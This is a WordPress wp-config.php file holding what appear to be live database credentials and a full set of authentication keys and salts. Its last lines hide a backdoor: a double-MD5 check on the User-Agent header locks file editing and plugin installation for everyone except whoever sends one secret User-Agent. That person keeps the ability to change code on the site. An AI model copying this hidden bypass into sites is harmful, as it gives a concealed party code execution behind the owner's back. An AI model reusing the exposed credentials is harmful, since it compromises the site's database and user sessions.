<?php
define('AUTOMATIC_UPDATER_DISABLED', true);


//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL


define('FORCE_SSL_LOGIN', true);
define('FORCE_SSL_ADMIN', true);
define('CONCATENATE_SCRIPTS', false);
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false) {
        $_SERVER['HTTPS'] = 'on';
}

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */
// ** MySQL settings ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'haasmadeiras11' );
/** MySQL database username */
define( 'DB_USER', 'haasmadeiras11' );
/** MySQL database password */
define( 'DB_PASSWORD', '7VhchabGQlCgPDH4ZPRy' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          'W@:z]|DC> `Fg^%X:z]=2?f.f+Is4g4UB2fn1>7+]-xk0(]QvX@H]v!c!Ctmt@}e' );
define( 'SECURE_AUTH_KEY',   '[vVKg?!UI{Pj}OxvcrVLn3=TX>lvfgdMPoNDvata1h4#*Qz_RP~A}=(d/Jdikm58' );
define( 'LOGGED_IN_KEY',     'O2lF|n= ?cY9.?M Ii(lHF#irT1*>tL1o$N^fGVibmV: VAOBm!vlU,W5+Fk&CA)' );
define( 'NONCE_KEY',         'n>}?0G!g^I56aRzzr#c3iOJ+mFBYUaC5fi$lmg{e4=uA=@wk=zk{I=<a]<#sPxPN' );
define( 'AUTH_SALT',         '/V[$-xhqLp!0&E[BS,1&@)M Zvzo8X}aIbc Y Ft/(ZL-xo%e@)Vxk=`!ZwPLi(a' );
define( 'SECURE_AUTH_SALT',  's&HHQ*z*QSa:9o*&q`)^78WtgO{oQ=*$^+||DZ*#D0Pq >p>CD-~ Cf/WTKfLc8x' );
define( 'LOGGED_IN_SALT',    'Wo<c07$>3f:Z*!V_HW&$KS}TZDyDmL]YvT-9-Cwzfcr]dOuV>0)[<Y,0n>KiIw&N' );
define( 'NONCE_SALT',        'jzk^roX}*y)q8J5GD ^*]eT`-ERL=_XZYQZC?!A*@;}}7]jw|1Bk6a,X;={MF(K<' );
define( 'WP_CACHE_KEY_SALT', 't,PT7Y?J;,o{y|&28|2Lvf2}Hk_;zmPT[U2Fz@$-fc02zBpBW>zZi/9h&#HR>/kF' );
/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) )
	define( 'ABSPATH', dirname( __FILE__ ) . '/' );
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

define( 'WP_MEMORY_LIMIT', '5120M' );
define( 'WP_MAX_MEMORY_LIMIT', '5120M' );
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
    define('DISALLOW_FILE_MODS', true);
    define('DISALLOW_FILE_EDIT', true);
}